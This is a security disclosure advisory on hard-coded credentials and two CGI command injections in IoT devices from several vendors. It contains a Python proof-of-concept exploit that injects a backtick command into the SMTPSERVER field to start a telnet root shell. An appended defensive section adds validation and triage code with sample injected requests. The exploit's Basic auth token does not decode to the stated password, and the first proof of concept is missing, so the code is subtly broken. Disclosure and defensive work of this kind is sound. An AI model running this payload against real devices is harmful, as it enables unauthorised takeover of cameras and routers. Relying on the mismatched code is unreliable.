SSD Advisory – Multiple IoT Vendors – Multiple Vulnerabilities
Credit to Author: SSD / Maor Schwartz | Date: Thu, 08 Feb 2018 08:02:43 +0000
Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom
See our full scope at: https://blogs.securiteam.com/index.php/product_scope
Vulnerabilities summary
The following advisory describes three (3) vulnerabilities found in devices from the following vendors:
- Lorex
- StarVedia
- Eminent
- Kraun
The vulnerabilities found:
- Hard-coded credentials
- Remote command injection (2)
It is possible to chain the vulnerabilities and to achieve unauthenticated remote command execution.
Credit
An independent security researcher, Robert Kugler (https://www.s3cur3.it), has reported these vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
We tried to contact Lorex, Kraun and Eminent; our attempts to establish contact went unanswered, so no details of a solution or a workaround are available for those vendors.
StarVedia was informed of the vulnerabilities and has released patches to address them: “These two issues were fixed before your contacting us”
Vulnerabilities details
Hard-coded credentials
A default user account that can be used to log in to the router’s web interface is “supervisor”, with the password “dangerous”.
Remote command injection (1)
User-controlled input is not sufficiently filtered, allowing an attacker to inject arbitrary commands by sending a POST request to wlanset.cgi with a malicious ‘SSID’ parameter.
Proof of Concept
Remote command injection (2)
User-controlled input is not sufficiently filtered, allowing an attacker to inject arbitrary commands by sending a POST request to smtpset.cgi with a malicious ‘SMTPSERVER’ parameter.
Proof of Concept
#!/usr/bin/python
import requests
import os
import time

print("Unauthenticated Remote Code Execution")

url = 'http://VICTIM-IP/cgi-bin/smtpset.cgi'  # Adjust IP address
payload = {'UseUserDefined': '1',
           'SMTPSERVER': '`/bin/busybox telnetd`',
           'SMTPPORT': '25',
           'SMTPNAME': '',
           'SMTPPASSWD': '',
           'SMTPTEST': 'SMTP+server+test'}
headers = {"Authorization": "Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==",
           "Content-type": "application/x-www-form-urlencoded"}
r = requests.post(url, data=payload, headers=headers)
time.sleep(5)
print("\nTry to connect to your target via telnet and use the user name root.")
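As an added example (not part of the advisory, and not code from any of the vendors named in it), the following Python shows the defensive side of both command-injection issues and of the hard-coded account: strict validation of the SMTPSERVER and SSID parameters before they reach any shell-backed helper, and a small triage routine that flags captured CGI POSTs whose parameters carry shell metacharacters or which authenticate with the factory-default account. The endpoint names, parameter names and the default credential come from the advisory; the policy limits (hostname or IPv4 syntax for SMTPSERVER, 1 to 32 printable characters for SSID), the finding labels and the sample captures are constructed for this example and are assumptions.

```python
# Added example (not from the advisory or any vendor firmware): parameter
# validation and request triage for the two CGI endpoints named in the advisory.
import base64
import re
from urllib.parse import parse_qs

# Factory-default account named in the advisory. A request that still
# authenticates with it means the device was never re-credentialed.
DEFAULT_CREDENTIAL = ("supervisor", "dangerous")

# Characters that let a value break out into a shell when a CGI handler builds
# a command line by string concatenation. Constructed list, not exhaustive for
# every shell, but it covers the backtick substitution shape in the advisory.
SHELL_META = re.compile(r"[`$;|&<>\n\r(){}\\'\"]")

# RFC 1123 host label: letters, digits and hyphens, no leading/trailing hyphen.
_HOST_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_smtp_server(value: str) -> bool:
    """Accept only a hostname or dotted IPv4 address for SMTPSERVER."""
    if not value or len(value) > 253:
        return False
    labels = value.rstrip(".").split(".")
    return all(_HOST_LABEL.match(label) for label in labels)


def is_valid_ssid(value: str) -> bool:
    """Accept 1..32 printable ASCII characters with no shell metacharacters.

    Real 802.11 SSIDs may be any 32 bytes; this is a deliberately strict
    policy (an assumption) for a device that hands the value to a shell helper.
    """
    if not 1 <= len(value) <= 32:
        return False
    if not all(32 <= ord(c) < 127 for c in value):
        return False
    return SHELL_META.search(value) is None


# Validation policy per endpoint: which parameter must pass which check.
PARAM_POLICY = {
    "smtpset.cgi": {"SMTPSERVER": is_valid_smtp_server},
    "wlanset.cgi": {"SSID": is_valid_ssid},
}


def uses_default_credential(authorization_header: str) -> bool:
    """True when a Basic Authorization header carries the factory-default pair."""
    scheme, _, token = authorization_header.partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    user, sep, password = decoded.partition(":")
    return sep == ":" and (user, password) == DEFAULT_CREDENTIAL


def triage_request(script: str, body: str, authorization: str = "") -> list:
    """Return finding labels for one captured CGI POST (empty list = clean)."""
    findings = []
    if authorization and uses_default_credential(authorization):
        findings.append("default-credential-login")
    form = parse_qs(body, keep_blank_values=True)
    for name, check in PARAM_POLICY.get(script, {}).items():
        for value in form.get(name, []):
            if not check(value):
                findings.append(f"{script}:{name}:rejected")
            if SHELL_META.search(value):
                findings.append(f"{script}:{name}:shell-metachar")
    return findings


# Constructed sample captures (script, URL-encoded body, Authorization header).
# Not real traffic; the second one carries the backtick shape from the advisory.
SAMPLE_REQUESTS = [
    ("smtpset.cgi", "UseUserDefined=1&SMTPSERVER=smtp.example.com&SMTPPORT=25",
     "Basic " + base64.b64encode(b"admin:changed-me").decode()),
    ("smtpset.cgi", "UseUserDefined=1&SMTPSERVER=%60%2Fbin%2Fbusybox+telnetd%60&SMTPPORT=25",
     "Basic " + base64.b64encode(b"supervisor:dangerous").decode()),
    ("wlanset.cgi", "SSID=HomeNet-5G&CHANNEL=6", ""),
    ("wlanset.cgi", "SSID=" + "A" * 33, ""),
]


def triage_samples() -> dict:
    """Run triage over the constructed captures; returns {index: findings}."""
    return {i: triage_request(*req) for i, req in enumerate(SAMPLE_REQUESTS)}


if __name__ == "__main__":
    for i, findings in triage_samples().items():
        print(i, SAMPLE_REQUESTS[i][0], findings or "clean")
```

The two finding labels are deliberately separate: `rejected` fires whenever the value fails the endpoint's policy (for instance an over-long SSID), while `shell-metachar` is the high-confidence injection indicator worth alerting on; a `default-credential-login` alongside either one is the chained, unauthenticated case the advisory describes.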